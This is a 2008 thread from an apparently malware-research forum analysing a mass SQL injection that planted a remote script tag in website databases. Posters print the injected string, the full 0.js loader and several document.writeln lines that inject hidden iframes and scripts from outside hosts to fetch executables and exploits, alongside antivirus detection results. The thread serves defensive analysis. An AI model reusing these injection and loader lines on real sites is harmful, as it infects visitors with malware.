| View previous topic :: View next topic |
| Author |
Message |
vk3ukf
Cadet

 Joined: Dec 11, 2004 Posts: 4 Location: Australia
|
Posted: Sat Jan 05, 2008 11:40 am Post subject: SQL attack, src=http://c.uc8010.com/0.js> |
|
|
Hello, I would like to ask if anyone can advise or enlighten me a little more.
Currently, if you type "src=http://c.uc8010.com/0.js>" into google, many references will come up.
It seems web pages on these sites have this code.
The site I have experienced recently had huge amounts of database text replaced with this string.
They have just apparently completed a system restore to a period of a week or two ago.
Below is what I could find out about it.
Hi, I have just discovered a social networking website I have been using with some unusal happenings.
Text and blogs being replaced with this,
src=http://c.uc8010.com/0.js>
The main URL only shows OK and a smile.
The full URL attempts to load a Java script file.
Below is the data I sent to the social networking site a few minutes ago.
-------------------------------------------
I have come across more information regarding the java script,
It was first identified by the Chinese on Dec 31 2007, it appeared in a western reference a few days later.
It is an SQL attack. There are now thousands of infected sites, most commercial. It is more than likely coming in with ads and banners from these sites.
See these refereneces for a little more information.
Original reference in Chinese.
http://www.itis.tw/malicious_url/2587
The same page above translated by Google.
http://translate.google.com/translate?hl=en&sl=zh-TW&u=http://www.itis.tw/malicious_url/2587&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dhttp://c.uc8010.com/0.js%253E%2Bvirus%26start%3D10%26hl%3Den%26sa%3DN
This may give some tech ideas as to elimination.
Translated from Chinese.
http://72.14.203.104/translate_c?hl=en&u=http://rogerspeaking.blogspot.com/2007/12/d-link.html&prev=/search%3Fq%3Dhttp://c.uc8010.com/0.js%253E%2Bvirus%26start%3D10%26hl%3Den%26sa%3DN
The reference mentioned for the first time in English.
http://www.sitepoint.com/forums/showthread.php?p=3672170
Also, you may continue to get re-infected from your ad feeds and infected users.
If anyone may comment further please.
Hoping this is of some assistance to any one experiencing the same.
K.
|
|
| Back to top |
|
 |
tetak
MIRT Team Lead Premium Member
 Joined: Jan 19, 2007 Posts: 5878
|
Posted: Sun Jan 06, 2008 6:11 pm Post subject: |
|
|
The site with the .js file on it seems to be down.
If you still have a sample of the malware please can you add it to a zip file and upload it as an attachment to this post. _________________ Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.
Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
|
|
| Back to top |
|
 |
MAPKOBKA
Lieutenant
 Premium Member
 Joined: Jul 04, 2007 Posts: 163
|
Posted: Sun Jan 06, 2008 8:56 pm Post subject: |
|
|
I sent it to Kaspersky, their reply was that "No malicious software was found in the attached file." _________________ Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
|
|
| Back to top |
|
 |
vk3ukf
Cadet

 Joined: Dec 11, 2004 Posts: 4 Location: Australia
|
Posted: Mon Jan 07, 2008 5:43 pm Post subject: |
|
|
Hello again, the main site is still active.
I typed the URL into my browser (IE) and it got diverted to some windows live search page??? I hate that, stop trying to think for me.
I did it again, then I got it, I saved the js file, below are the contents.
function setCookie(name,value)
{
var Days = 1;
var exp = new Date();
exp.setTime(exp.getTime() + Days*1*60*60*1000);//Days*24*60*60*1000;
document.cookie = name + "="+ escape(value) +";expires="+ exp.toGMTString();
}
function getCookie(name)
{
var arr = document.cookie.match(new RegExp("(^| )"+name+"=([^;]*)(;|$)"));
if(arr != null)
{
return unescape(arr[2]);
}
else
{
document.writeln("<script src=http:\/\/c.uc8010.com\/0\/w.js><\/script>");
// document.writeln("<iframe src=\"http:\/\/c.uc8010.com\/ip\/Cip.aspx\" width=\"20\" height=\"0\" scrolling=\"no\" frameborder=\"0\"><\/iframe>");
setCookie("Lin","ok");
return null;
}
}
getCookie("
I do not understand java, the site that had a great pile of blog text replaced was Yuwie, they seem to be OK at the moment.
Say I had written 25 lines of text and posted it, there would be 1 line, with src=http://c.uc8010.com/0.js>
at the end.
K.
|
|
| Back to top |
|
 |
vk3ukf
Cadet

 Joined: Dec 11, 2004 Posts: 4 Location: Australia
|
Posted: Mon Jan 07, 2008 5:49 pm Post subject: Added 0.js above but not zip oops, zip is attached to this |
|
|
The post above, I tried to add the o.js file, but didn't zip it, the zip is attached to this file.
|
|
| Back to top |
|
 |
tetak
MIRT Team Lead Premium Member
 Joined: Jan 19, 2007 Posts: 5878
|
Posted: Mon Jan 07, 2008 10:45 pm Post subject: |
|
|
Thanks for uploading the file.
Is anybody able to download either of thses files?
| Code: |
http://c.uc8010.com/0/w.js
http://c.uc8010.com/ip/Cip.aspx
|
If you can please can you add the files in a .zip file and upload them as an attachment to this post. _________________ Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.
Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
|
|
| Back to top |
|
 |
MAPKOBKA
Lieutenant
 Premium Member
 Joined: Jul 04, 2007 Posts: 163
|
Posted: Mon Jan 07, 2008 11:04 pm Post subject: |
|
|
(First link)
That link was dead the last time I checked, looks like there is a malicious script there now.
Tries to download
Opens iframes/scripts
document.writeln("<iframe src=hxxp:\/\/c.uc8010.com\/1.html width=1 height=0><\/iframe>");
document.writeln("<script src=\'hxxp:\/\/s106.cnzz.com\/stat.php?id=742266&web_id=742266\' language=\'JavaScript\' charset=\'gb2312\'><\/script>");
document.writeln("<script src=\'hxxp:\/\/c.uc8010.com\/0\/007.js\' language=\'JavaScript\'><\/script>");
hxxp://c.uc8010.com/0/1.exe and 19.exe
Also, one of the iframes leads to
hxxp://ftpgen2008.521066.com/aawowuiq/
Where
<script src=06014.js></script>
<script src=real.js></script>
<script src=07055.js></script>
<script src=yahoo.js></script>
are downloaded
Second link for me simply downloads "Hello" and nothing else.
I've just had a quick look round, there is probably a lot more than that.
I have zipped up the scripts/iframes/.exes and am attaching to this post. _________________ Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
|
|
| Back to top |
|
 |
bctrainers
Cadet

 Joined: Jan 08, 2008 Posts: 1 Location: USA
|
|
| Back to top |
|
 |
MAPKOBKA
Lieutenant
 Premium Member
 Joined: Jul 04, 2007 Posts: 163
|
Posted: Tue Jan 08, 2008 4:14 pm Post subject: |
|
|
Kaspersky have analysed those files and found the following:
06014.js_ - Trojan-Downloader.JS.Psyme.xn
07055.js_ - Trojan-Downloader.JS.Agent.ats,
load.exe_ - Trojan.Win32.Pakes.bxl,
real.js_ - Exploit.Win32.RealPlr.s,
w.js_ - Trojan-Downloader.JS.Agent.auk,
yahoo.js_ - Trojan-Downloader.JS.Agent.atr _________________ Kaspersky Lab Forum Moderator
KL Cert PSP
Virusinfo.info External Specialist
Alliance of Security Analysis Professionals Member
http://malwarecrawler.com - honeypot@malwarecrawler.com
|
|
| Back to top |
|
 |
tetak
MIRT Team Lead Premium Member
 Joined: Jan 19, 2007 Posts: 5878
|
|
| Back to top |
|
 |
Amrodg
Cadet

 Joined: Jan 11, 2008 Posts: 2 Location: USA
|
Posted: Fri Jan 11, 2008 1:03 am Post subject: |
|
|
When the javascript is ran from a website it also downloads hxxp://www.worldofwarcraftn.com/1.exe. The website is down now, but I have a copy of the file. Should I zip it up and attach it?
Amrodg
|
|
| Back to top |
|
 |
tetak
MIRT Team Lead Premium Member
 Joined: Jan 19, 2007 Posts: 5878
|
Posted: Sun Jan 13, 2008 4:33 pm Post subject: |
|
|
I was able to download 1.exe from the site but it doesn't appear to contain any malware.
Just incase I have a different version could you add the file to a .zip file and upload it as an attachment to this post? _________________ Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.
Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
|
|
| Back to top |
|
 |
Amrodg
Cadet

 Joined: Jan 11, 2008 Posts: 2 Location: USA
|
Posted: Tue Jan 15, 2008 12:38 pm Post subject: |
|
|
Attached the 1.exe. When it is run it places the dll that is included in the zip file into the Windows directory.
|
|
| Back to top |
|
 |
tetak
MIRT Team Lead Premium Member
 Joined: Jan 19, 2007 Posts: 5878
|
Posted: Thu Jan 17, 2008 11:02 pm Post subject: |
|
|
Thanks for uploading the files, they are both well detected so I didn't add them to the malware listserv. _________________ Got Windows XP? Help protect your PC from malware with Microsofts anti-spyware program Windows Defender.
Download it for free from http://www.microsoft.com/athome/security/spyware/software/default.mspx
|
|
| Back to top |
|
 |
|
|